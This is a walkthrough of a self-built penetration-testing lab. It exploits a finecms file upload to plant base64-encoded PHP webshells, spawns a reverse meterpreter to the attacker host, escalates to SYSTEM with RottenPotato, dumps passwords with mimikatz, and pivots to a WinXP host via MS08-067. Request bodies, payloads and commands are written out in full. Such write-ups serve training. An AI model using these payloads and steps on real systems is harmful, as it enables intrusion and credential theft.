Self built shooting range 2022
2022-07-05 13:42:00 [Syche]
Contents
One. Introduction to the range
Two. Taking the web server
2.1 Arbitrary file upload to get a shell
Three. Intranet penetration
One. Introduction to the range

This is a simple intranet penetration range. You first need to obtain access to the win2008 server, then pivot into the intranet and compromise WinXP. There is no flag on win2008; the flag is on WinXP. It exercises a broad mix of knowledge, no protection software is deployed yet, and it is a relatively basic range.
The main configuration is as follows:
System | IP address
--- | ---
kali 2020 | 192.168.1.106
win10 (this machine) | 192.168.1.104
win2008 | 192.168.1.107
winxp | 10.101.10.133
The range download link is as follows:
Link: https://pan.baidu.com/s/14WRh6C8Fdpk5hfmZ9ar8Uw
Extraction code: ehs8
PS: win10 and kali are provided by yourself
Sharing it too widely risks getting the link blocked, so it is currently limited to 10 downloads; there should not be many people playing this range anyway.
Two. Taking the web server
2.1 Arbitrary file upload to get a shell
nmap 192.168.1.107 -p 8069 -sV

Port 8069 is the web port; visiting http://192.168.1.107:8069/ shows it is running finecms.
Search Baidu for finecms vulnerabilities.
Register an account on the front end.

First upload a normal avatar to find the upload path.
<?php @eval($_POST['a']); ?> # one-line PHP webshell, base64-encoded below
IDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=
Construct the request as follows:
POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be39236988f55e17096d
tx=data%3Aimage%2Fphp%3Bbase64%2CIDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=
The payload above can be connected to with China Chopper or AntSword.
Here I use Behinder (冰蝎); the base64 payload below is the Behinder webshell.
POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be39236988f55e17096d
tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pg==%3D

You could also upload an msf-generated exe here.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.106 lport=4444 -f exe -o web.exe
But since we are using Behinder anyway, just get a reverse shell directly.
2.2 Reverse meterpreter
Use Behinder to spawn a reverse meterpreter


2.3 Privilege escalation
migrate pid # migrate into another process
post/multi/recon/local_exploit_suggester # msf: enumerate privilege-escalation candidates
post/windows/gather/enum_patches
# Enumerate installed patches, then look up a matching escalation on the reference site
http://bugs.hacking8.com/tiquan/ # privilege-escalation lookup page; here RottenPotato is used with msf
execute -HC -f rottenpotato.exe # run RottenPotato hidden and channelized to obtain a SYSTEM token
use incognito # load the incognito module
list_tokens -u # list all tokens
impersonate_token "NT AUTHORITY\\SYSTEM" # impersonate the token

2.4 Dumping hashes
The mimikatz and hashdump built into msf had problems here, so I uploaded a mimikatz downloaded from GitHub.
Use the following commands to obtain the plaintext password.
cd C:\Users\Administrator\Desktop
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > password.txt
Account | Password
--- | ---
administrator | hacker1961

Three. Intranet penetration
3.1 Information gathering
Use ipconfig and arp_scanner to discover the intranet IP addresses

The intranet segment is 10.101.10.0/24

Discovered intranet host 10.101.10.133
run autoroute -s 10.101.10.0/24 # add a route
run autoroute -p # confirm the route was added

3.2 Configure the proxy
use auxiliary/server/socks_proxy
Note that the version to set here is 4a
set version 4a
run
vim /etc/proxychains.conf # edit the proxychains configuration file
3.3 nmap port scan
proxychains nmap -Pn -sT 10.101.10.133 -p 80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389 --open

3.4 Exploitation

Nothing of interest on port 80, but port 445 is open.
use auxiliary/scanner/smb/smb_version # scan the smb version
search ms08_067 # search for the MS08-067 module, a classic vulnerability
set rhost 10.101.10.133
run

smb_version identifies the host as WinXP SP3, so use ms08_067 against it.

No privilege escalation is needed here; the session already has SYSTEM privileges.
Get the flag from C:\Documents and Settings\Administrator\Desktop
cd C:\Documents and Settings\Administrator\Desktop
type flag.txt

flag{aGFwcHkgbmV3IHllYXIh}
The flag decodes with
echo "aGFwcHkgbmV3IHllYXIh" | base64 -d

3.5 Remote login
Obtain the hash


Or use the mimikatz built into msf
load kiwi # load mimikatz
creds_all # dump credentials

Account | Password
--- | ---
administrator | 123456
Then log in over 3389
proxychains rdesktop 10.101.10.133


Four. Appendix: privilege escalation
Here the author has collected some basic privilege-escalation notes gathered while working through the range.
4.1 Local privilege escalation
NSudoLC privilege escalation
# Project description
https://nsudo.m2team.org/zh-hans/
# Project address
https://github.com/Thdub/NSudo_Installer
Use the x64 NSudoLC.exe; NSudoLG.exe is the GUI version. The latest version can escalate locally on win10.
NSudoLC.exe -U:S -P:E web.exe
Administrator privileges are required here; it can then elevate to SYSTEM.
BitsArbitraryFileMoveExploit.exe privilege escalation
This is a local privilege-escalation vulnerability released in August 2020. Many versions are affected, including the latest win10, so it is a relatively recent escalation vulnerability. However, it can only be run by double-clicking, which pops up a SYSTEM-privilege window.
4.2 Remote privilege escalation
Section 2.3 of this article used RottenPotato in msf; here is another way to escalate.
Upload cve-2019-1458.exe
Then run cve-2019-1458.exe web.exe
This returns a meterpreter with SYSTEM privileges

Privilege escalation can be divided into several categories:
Escalation via system vulnerabilities (divided into local and remote escalation)
Process migration (msf migrate)
bypassuac escalation (modules integrated in msf)
Token theft escalation (RottenPotato)
Database escalation (with database root privileges you can obtain the highest system privileges)
Links used in this article :
Kernelhub/CVE-2020-0787 at master · iNarcissuss/Kernelhub · GitHub
Kernelhub/cve-2019-1458.exe at master · Ascotbe/Kernelhub · GitHub
Author of this article: sm